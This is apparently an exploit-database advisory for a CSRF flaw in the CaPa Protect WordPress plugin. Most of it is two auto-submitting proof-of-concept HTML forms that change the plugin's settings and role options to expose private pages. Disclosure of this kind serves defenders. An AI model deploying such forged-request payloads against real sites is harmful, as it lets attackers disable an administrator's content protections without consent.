Lucene search

K
wpexploitDaniel RufWPEX-ID:E025F821-81C3-4072-A89E-A5B3D0FB1275
HistoryMay 30, 2022 - 12:00 a.m.

CaPa Protect <= 0.5.8.2 - Arbitrary Settings Update via CSRF

2022-05-3000:00:00
Daniel Ruf
84
capa protect
arbitrary settings update
csrf
security vulnerability
csrf exploit

EPSS

0.001

Percentile

26.3%

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack and disable the applied protection.

<form id="test" action="https://example.com/wp-admin/admin.php?page=capa%2Fcapa-options" method="POST">
    <input type="text" name="capa_protect_show_private_pages" value="on">
    <input type="text" name="capa_protect_show_private_categories" value="on">
    <input type="text" name="capa_protect_post_policy" value="show message">
    <input type="text" name="capa_protect_comment_policy" value="all">
    <input type="text" name="capa_protect_show_only_allowed_attachments" value="on">
    <input type="text" name="submit" value="Update general settings">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.getElementById("test")
    );
</script>


<form id="test" action="https://example.com/wp-admin/admin.php?page=capa%2Fcapa-roles-page" method="POST">
    <input type="text" name="empty" value="0">
    <input type="text" name="capa_protect_cat[visitor][]" value="1">
    <input type="text" name="empty" value="0">
    <input type="text" name="capa_protect_pag[visitor][]" value="2">
    <input type="text" name="empty" value="0">
    <input type="text" name="capa_protect_pag[visitor][]" value="132">
    <input type="text" name="empty" value="0">
    <input type="text" name="empty" value="0">
    <input type="text" name="empty" value="0">
    <input type="text" name="empty" value="0">
    <input type="text" name="empty" value="0">
    <input type="text" name="empty" value="0">
    <input type="text" name="empty" value="0">
    <input type="text" name="empty" value="0">
    <input type="text" name="submit" value="Update Role Options">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.getElementById("test")
    );
</script>

EPSS

0.001

Percentile

26.3%

Related for WPEX-ID:E025F821-81C3-4072-A89E-A5B3D0FB1275